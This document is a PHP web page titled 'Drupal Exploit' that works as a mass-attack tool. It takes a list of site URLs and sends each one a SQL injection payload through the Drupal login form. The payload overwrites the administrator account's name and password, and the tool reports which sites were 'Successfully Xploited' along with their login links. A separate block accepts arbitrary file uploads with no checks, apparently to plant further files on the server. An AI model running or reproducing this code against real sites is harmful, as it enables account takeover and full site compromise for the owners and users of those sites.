Drupal Exploit

 <!Doctype HTML>
<html>
<head>
    <title>Drupal Exploit</title>
    <style type="text/css">
    .mymargin{
        margin-top:30px;
        font-family: monospace;
    }
    body, html {
        background-color:black;
        text-align: center;
        color: #008000;
        margin: 10px auto;
    }
    a {
    color: lime;
    text-decoration: none;
}
    </style>
</head>
<body>
<center>
    <div class="mymargin">
        <center>
            <form method="POST" action="">
        <font color='#008000'>WebSite :</font> <br>
        <textarea name="url" placeholder="Example: www.site.com" style="resize: none; border: 1px solid #008000; color: #bb0000; background: transparent; margin: 5px auto; padding-left: 5px; width: 500px; height: 250px;"></textarea><br>
        <input style="border: 1px solid #008000; color: #bb0000; background: transparent; margin: 5px; width: 350px; height: 25px;" size="50" type="submit" name="submit" value="Attack">
    </form>
    <br>
<?php
error_reporting(0);
$submit = $_POST['submit'];
$url = explode("\r\n", $_POST['url']);
if($submit) {
    foreach($url as $sites) {
    $log = "/user/login";
    $holako = "/?q=user";
    $post_data = "name[0;update users set name %3D 'azzatssins' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
    $params = array(
        'http' => array(
        'method' => 'POST',
        'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
        'content' => $post_data
        )
    );
    $ctx = stream_context_create($params);
    $data = file_get_contents($sites . '/user/login/', null, $ctx);
    echo "<u>Testing user/login</u><br>";
    if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
        echo "Scanning: <font color=lime>$sites</font><br>";
        echo "Status: Successfully Xploited!<br>";
        echo "Data=> user: <font color='#ff3'>azzatssins</font> | pass: <font color='#ff3'>admin</font><br>";
        echo "Login: <a href='$sites$log' target='_blank' style='text-decoration: none'>$sites$log</a><br><br>";
    } else {
        echo "Scanning: <font color=lime>$sites</font><br>";
        echo "Status: <font color=red>Not Xploited!</font><br><br>";
    }
}
}
if($submit) {
    foreach($url as $sites) {
    $post_data = "name[0;update users set name %3D 'azzatssins' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
    $params = array(
        'http' => array(
        'method' => 'POST',
        'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
        'content' => $post_data
        )
    );
    $ctx = stream_context_create($params);
    $data = file_get_contents($sites . '?q=node&destination=node', null, $ctx);
    echo '<u>Testing at Index</u><br>';
    if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
        echo "Scanning: <font color=lime>$sites</font><br>";
        echo "Status: Successfully Xploited!<br>";
        echo "Data => user: <font color='#ff3'>azzatssins</font> | pass: <font color='#ff3'>admin</font><br>";
        echo "Login: <a href='$sites$log' target='_blank' style='text-decoration: none'>$sites$log</a><br><br>";
    } else {
        echo "Scanning: <font color=lime>$sites</font><br>";
        echo "Status: <font color=red>Not Xploited!</font><br><br>";
    }
}
}
?>
    </div>
<?php

$Drupal  = $_POST['Drupal'];


if($Drupal == 'Drupal') {

$filename = $_FILES['file']['name'];
$filetmp  = $_FILES['file']['tmp_name'];

echo "<form method='POST' enctype='multipart/form-data'>
   <input type='file'name='file' />
   <input type='submit' value='go' />

</form>";
move_uploaded_file($filetmp,$filename);
}
?>
</body>
</html>